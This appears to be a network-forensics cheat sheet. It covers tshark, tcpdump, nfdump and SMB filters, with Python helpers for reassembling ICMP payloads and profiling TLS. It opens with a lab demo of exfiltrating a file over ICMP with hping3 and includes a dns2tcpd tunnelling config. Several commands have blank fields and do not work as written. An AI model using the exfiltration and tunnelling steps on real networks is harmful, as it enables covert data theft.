Hacking Network Forensics Wireshark

Data exfiltration over ICMP

hping3 on Kali Linux

-E <file>  send the contents of the file as packet payload
-1         use ICMP (echo request) mode
-u         tell you when --file reached EOF and prevent rewind
-i 10      send one ICMP packet every 10 seconds (slow)
-d 95      data size in bytes per packet (the output below reports 28 headers + 95 data bytes)

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95
HPING (eth0 icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=123 ip= ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip= ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip= ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip= ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Contents of the file sent, dns2tcp.txt:

root@kali:~# cat dns2tcp.txt

cat dns2tcpdrc

listen =
port = 53
user = nobody
chroot = /tmp/
domain =
resources = ssh:
dns2tcpd -F -d 3 -f /dns2tcpdrc


Monitor on receiving end using Wireshark

Display filter: icmp

Each echo request carries the next chunk of the file as its ICMP payload: the first packet (icmp_seq=0) holds the first part of the original file, the second the next part, and so on, so the file is recovered by concatenating the payloads in icmp_seq order.
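As an added example (not part of the original notes), the Python below reconstructs the receiving end of this procedure offline: it parses raw IPv4/ICMP echo requests, joins the payloads in icmp_seq order and flags payloads that do not look like a normal ping. The packet builder and the sample file contents are constructed for the test; checksums are not verified.

```python
import struct

def build_icmp_echo(src, dst, ident, seq, payload):
    """Construct a minimal IPv4 + ICMP echo request as hping3 -1 -E would emit
    (checksums left at zero; the parser below does not verify them). Test data only."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + icmp

def parse_icmp_echo(pkt):
    """Return (src, ident, seq, payload) for an ICMP echo request, else None."""
    ihl = (pkt[0] & 0x0F) * 4 if len(pkt) > 9 else 0
    if ihl < 20 or len(pkt) < ihl + 8 or pkt[9] != 1:   # IP protocol 1 = ICMP
        return None
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[ihl:ihl + 8])
    if icmp_type != 8:                                   # type 8 = echo request
        return None
    return ".".join(map(str, pkt[12:16])), ident, seq, pkt[ihl + 8:]

def reassemble(packets):
    """Group echo payloads by (source, ICMP id) and join them in icmp_seq order,
    which is how the per-packet chunks seen in Wireshark are read back into the file."""
    streams = {}
    for pkt in packets:
        parsed = parse_icmp_echo(pkt)
        if parsed:
            src, ident, seq, payload = parsed
            streams.setdefault((src, ident), {})[seq] = payload
    return {k: b"".join(v[s] for s in sorted(v)) for k, v in streams.items()}

def looks_like_exfil(payload):
    """Heuristic: Linux ping fills the payload after an 8-byte timestamp with the
    byte ramp 0x10, 0x11, ...; a mostly printable payload that lacks it stands out."""
    if not payload or payload[8:16] == bytes(range(0x10, 0x18)):
        return False
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in payload)
    return printable / len(payload) > 0.9

# Constructed sample: a small config file split into 16-byte chunks, arriving out of order.
SECRET = b"port = 53\nuser = nobody\nchroot = /tmp/\n"
CHUNKS = [SECRET[i:i + 16] for i in range(0, len(SECRET), 16)]
PACKETS = [build_icmp_echo("10.0.0.5", "10.0.0.9", 0xBEEF, s, c) for s, c in enumerate(CHUNKS)]
PACKETS.reverse()                                        # arrival order need not match icmp_seq
PING = build_icmp_echo("10.0.0.7", "10.0.0.9", 1, 1, bytes(8) + bytes(range(0x10, 0x40)))

if __name__ == "__main__":
    for key, data in reassemble(PACKETS + [PING]).items():
        print(key, "suspicious" if looks_like_exfil(data) else "benign", data[:40])
```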

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr


tshark -r file -Y '<display filter>' -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort -nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y ' contains "google" and http.request'

  • Determine POST to domain

tshark -n -r /cases/*.pcap -Y ' contains "dropbox.xom" and http.request.method == "POST"'

  • Observe content in frame number

tshark -n -x -r /cases/*.pcap -Y 'frame.number==27757'

  • Identify TCP stream number

tshark -n -x -r /cases/*.pcap -Y 'frame.number==27757' -T fields -e

  • Extract base64 data from stream

tshark -n -r /cases/*.pcap -Y '' -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web url requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y 'http.request.uri contains "dropbox"'


md5sum cases.pcap


sudo tcpdump -n -i eth0 -s 0 "arp"

sudo tcpdump -n -i eth0 -s 0 "arp and not ether dst ff:ff:ff:ff:ff:ff"

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap "net"


  • List pcap filename, md5 hash, and start/end capture times

capinfos -T -H -a -e *.pcap /cases/*


editcap -A '2015-11-15 00:00:00' -B '2015-11-16 00:00:00' /cases/*.pcap ~/smaller.pcap


  • Encode to Base64

cat file | base64 > file.txt

  • URL Base64 decode

Obtain the base64 text from Follow Stream in Wireshark and save it to a file. URL-safe base64 uses - and _ in place of + and /, so convert it to native base64 first:

cat base64-from-url.txt | > native-base64.txt

Decode the base64 data into a new file:

base64 -di native-base64.txt > decode-base64.bin

  • check intended file type

file decode-base64.bin

unzip -t decode-base64.bin

certutil -decode file.txt test.exe
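Added example, not from the original notes: the URL-safe-to-native conversion, padding repair and magic-byte file-type check from the steps above, as one Python script. The magic table and the sample blob are constructed here.

```python
import base64
import binascii

# Magic bytes for the file types this section checks for (constructed table).
MAGIC = [(b"PK\x03\x04", "zip archive"), (b"MZ", "Windows executable"),
         (b"%PDF", "PDF document"), (b"\x7fELF", "ELF executable")]

def url_to_native_base64(text):
    """URL-safe base64 (RFC 4648 section 5) uses - and _ for + and / and often
    drops the = padding; restore both so a 'base64 -d' style decoder accepts it."""
    cleaned = "".join(text.split())                 # drop newlines copied from the stream
    native = cleaned.replace("-", "+").replace("_", "/")
    return native + "=" * (-len(native) % 4)

def decode_url_base64(text):
    """Decode URL-safe base64 text; returns None instead of raising on garbage."""
    try:
        return base64.b64decode(url_to_native_base64(text), validate=True)
    except (binascii.Error, ValueError):
        return None

def identify(data):
    """Name the file type by its magic bytes, like 'file decode-base64.bin'."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"

# Constructed sample: a fake PE header as it might appear in a URL parameter (padding stripped).
SAMPLE = base64.urlsafe_b64encode(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff").decode().rstrip("=")

if __name__ == "__main__":
    blob = decode_url_base64(SAMPLE)
    print(identify(blob), blob[:8])
```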


sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and contains "google"

http.request.method == "POST" and contains ""


  • Order by number of bytes, aggregate on protocol

nfdump -O bytes -o extended -R cases/ 'ip' -A proto

  • Show only sessions with just the SYN flag set (connection attempts), order by packets, aggregate on src and dst IP

nfdump -O packets -R cases/ -A srcip,dstip 'proto tcp and src ip and flags S and not flags AFRPU'

  • Example with custom output format and filter

nfdump -O packets -A dstip -t '2015/07/15-2015/08/15' -R cases/ -o 'fmt:%da %pkt %fl %bpp' 'proto tcp and src ip and flags S and not flags AFRPU and (dst ip or dst ip or dst ip)'

  • Output formats

-o long, extended

-o "fmt:%sa %da"

Tag   Description
%ts   Start time (first seen)
%te   End time (last seen)
%td   Duration
%pr   Protocol
%sa   Source address
%da   Destination address
%sap  Source address:port
%dap  Destination address:port
%sp   Source port
%dp   Destination port
%sas  Source AS
%das  Destination AS
%in   Input interface number
%out  Output interface number
%pkt  Packets
%byt  Bytes
%fl   Flows
%flg  TCP flags
%tos  ToS
%bps  bps, bits per second
%pps  pps, packets per second
%bpp  Bytes per packet

-B  bidirectional aggregation: flow direction is decided from the port numbers (port >1024 is taken as the client, port <1024 as the server)

nfdump -B -O tstart -o extended -R 2013/ -o 'fmt:%ts %te %sa %da %d' 'proto tcp and src ip and flags S and not flags AFRPU'





–enable referrer

SMB protocol Wireshark filters

SMB sessions stay active until:

- The network connection times out

- The user closes the session

- The user de-authenticates

- The connection fails a server-side security check

Protocol Negotiation      "smb.cmd == 0x72"

LANMAN / NTLM negotiation

Session Establishment     "smb.cmd == 0x73"

The spnego.negResult field indicates whether authentication was successful (result == 0x00 on success)

The process ID (smb.pid) gives an indication of whether authentication was initiated by a core system process (PID < 1000) or a user-level process (PID > 1000)

Every exchange within a session is identified by the Multiplex ID (smb.mid), so client and server can pair response packets with their requests

When authentication succeeds a User ID (smb.uid) is assigned; it is only valid for the duration of that SMB session

Accessing a Service       "smb.cmd == 0x75"

Tree Connect: request access to a share or resource

The server checks the request; if successful a Tree ID (smb.tid) is added

Network Directory         "smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004"

Opening a file            "smb.cmd == 0xa2"

If the client is permitted access to the file, the server returns a file ID (FID). The FID is only valid while that handle is open, so do not use it to track file access; filter on the file name in the create request instead:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create AndX request       "smb.cmd == 0xa2 and !smb.fid and smb.file"

Locking file for access   "smb.cmd == 0x24"

Reading from file         "smb.cmd == 0x2e"

Closing a file            "smb.cmd == 0x04"

Tree Disconnect           "smb.cmd == 0x71"

Uses the corresponding Tree ID

Logoff                    "smb.cmd == 0x74"

Uses the corresponding UID and PID

Process ID   smb.pid (e.g. 996 == 0x03e4)
User ID      smb.uid
Tree ID      smb.tid
File ID      smb.fid
  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2
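An added example (not the author's code) that turns the ID chaining described above into a tracker: it takes decoded SMB1 request/response records as dicts keyed by the Wireshark field names used in this section plus ntlmssp.auth.username and smb.path, pairs each response with its request via PID and MID, and records which user opened which file on which share. The exchange below is constructed.

```python
# Minimal SMB1 session tracker over already-decoded fields; records are constructed dicts.
SESSION_SETUP, TREE_CONNECT, NT_CREATE, CLOSE, TREE_DISCONNECT, LOGOFF = 0x73, 0x75, 0xA2, 0x04, 0x71, 0x74

def rec(cmd, is_resp, pid, mid, **fields):
    return {"smb.cmd": cmd, "smb.flags.response": is_resp, "smb.pid": pid, "smb.mid": mid, **fields}

def track_smb(records):
    """Walk request/response records in capture order; return the files each
    authenticated user opened, keyed by (user, share), and the handles still open."""
    users, shares, open_files, accessed, pending = {}, {}, {}, {}, {}
    for r in records:
        cmd, key = r["smb.cmd"], (r["smb.pid"], r["smb.mid"])   # PID+MID pairs a response with its request
        if not r["smb.flags.response"]:
            pending[key] = r
            continue
        req = pending.pop(key, {})
        if cmd == SESSION_SETUP and r.get("spnego.negResult") == 0:
            users[r["smb.uid"]] = req.get("ntlmssp.auth.username", "?")   # UID valid only for this session
        elif cmd == TREE_CONNECT:
            shares[r["smb.tid"]] = req.get("smb.path", "?")               # TID assigned on success
        elif cmd == NT_CREATE:
            who = (users.get(r["smb.uid"], "?"), shares.get(r["smb.tid"], "?"))
            accessed.setdefault(who, []).append(req["smb.file"])           # track by name, not by FID
            open_files[(r["smb.uid"], r["smb.fid"])] = req["smb.file"]
        elif cmd == CLOSE:
            open_files.pop((r["smb.uid"], req.get("smb.fid")), None)
        elif cmd == TREE_DISCONNECT:
            shares.pop(r["smb.tid"], None)
        elif cmd == LOGOFF:
            users.pop(r["smb.uid"], None)
    return accessed, open_files

# Constructed exchange: logon, tree connect, two file opens, one close, logoff.
RECORDS = [
    rec(SESSION_SETUP, False, 996, 1, **{"ntlmssp.auth.username": "alice"}),
    rec(SESSION_SETUP, True, 996, 1, **{"spnego.negResult": 0, "smb.uid": 2048}),
    rec(TREE_CONNECT, False, 996, 2, **{"smb.path": r"\\FS01\Finance"}),
    rec(TREE_CONNECT, True, 996, 2, **{"smb.uid": 2048, "smb.tid": 1}),
    rec(NT_CREATE, False, 996, 3, **{"smb.file": r"\budget.xlsx"}),
    rec(NT_CREATE, True, 996, 3, **{"smb.uid": 2048, "smb.tid": 1, "smb.fid": 0x4001}),
    rec(NT_CREATE, False, 996, 4, **{"smb.file": r"\payroll.csv"}),
    rec(NT_CREATE, True, 996, 4, **{"smb.uid": 2048, "smb.tid": 1, "smb.fid": 0x4002}),
    rec(CLOSE, False, 996, 5, **{"smb.fid": 0x4001}),
    rec(CLOSE, True, 996, 5, **{"smb.uid": 2048, "smb.tid": 1}),
    rec(LOGOFF, False, 996, 6), rec(LOGOFF, True, 996, 6, **{"smb.uid": 2048}),
]

if __name__ == "__main__":
    print(track_smb(RECORDS))
```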

Collecting log evidence

Firewall files

IDS files

Firewall rule options (iptables):
-d              destination ip

-i              input interface

-o              output interface

-p              layer 4 proto

--dport         destination port

--syn           match packets with only the SYN flag set

-j LOG          log matched traffic

-j REJECT       reject matched traffic

SSL Traffic

  • Profile client encryption ciphers

tshark -n -r /cases/*pcap -Y 'ssl.handshake.type == 1' -T fields -e ip.src -e ssl.record.version -e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk '{print $3}' | sort | uniq -c | sort -nr

  • Identify SSL certificate subject

tshark -n -r /cases/*pcap -Y 'ssl.handshake.certificate' -T fields -E separator='|' -E aggregator='|' -e x509ce.dNSName -e x509sat.teletexString -e x509sat.uTF8String -e x509sat.universalString -e x509sat.IA5String | tr -s '|' '\n' | sort | uniq -c | sort -nr
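Added example (not from the original page) showing what the cipher-profiling command above extracts: a parser for the cipher-suite list of a TLS ClientHello record (ssl.handshake.type == 1), tallied per client address the way the awk | sort | uniq -c pipeline does. The ClientHello builder and the flows are constructed test data with no extensions.

```python
import struct
from collections import Counter

def build_client_hello(cipher_suites, version=0x0303):
    """Construct a minimal TLS ClientHello record (no extensions). Test data only."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"           # client_version, random, empty session id
    body += struct.pack("!H", 2 * len(cipher_suites)) + b"".join(struct.pack("!H", c) for c in cipher_suites)
    body += b"\x01\x00"                                               # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body         # handshake type 1 = ClientHello
    return b"\x16" + struct.pack("!HH", version, len(handshake)) + handshake

def client_hello_ciphersuites(record):
    """Return the offered cipher suites from a TLS record holding a ClientHello,
    or None for anything else (other handshake types, truncated records)."""
    if len(record) < 44 or record[0] != 0x16 or record[5] != 0x01:
        return None
    pos = 44 + record[43]                      # skip record/handshake headers, version, random, session id
    if pos + 2 > len(record):
        return None
    cs_len = struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2
    if pos + cs_len > len(record):
        return None
    return [struct.unpack("!H", record[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]

def profile_clients(flows):
    """flows: iterable of (client_ip, record bytes). Counts how often each distinct
    cipher-suite list is offered per client, like the sort | uniq -c tally above."""
    counts = Counter()
    for ip, record in flows:
        suites = client_hello_ciphersuites(record)
        if suites is not None:
            counts[(ip, tuple(suites))] += 1
    return counts.most_common()

# Constructed flows: one client offering modern suites twice, one offering only an export-grade suite.
MODERN = [0xC02F, 0xC030, 0x009C]                # ECDHE-RSA-AES-GCM suites and RSA-AES128-GCM
FLOWS = [("10.0.0.5", build_client_hello(MODERN)), ("10.0.0.5", build_client_hello(MODERN)),
         ("10.0.0.8", build_client_hello([0x0003])),                # TLS_RSA_EXPORT_WITH_RC4_40_MD5
         ("10.0.0.8", b"\x16\x03\x03\x00\x05\x02\x00\x00\x01\x00")]  # a ServerHello fragment, ignored

if __name__ == "__main__":
    for (ip, suites), n in profile_clients(FLOWS):
        print(n, ip, " ".join(f"0x{c:04x}" for c in suites))
```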


  • Search PCAP for strings

ngrep -I dump6.pcap -w 'root' -N -t -q

  • Search PCAP for hex value

ngrep -I dump6.pcap -xX '0xc5d5e5f55666768696a6b6c6d6e6' -N -t -q


  • Extract files (auto file carving) from pcap

tcpxtract -f dump3.pcap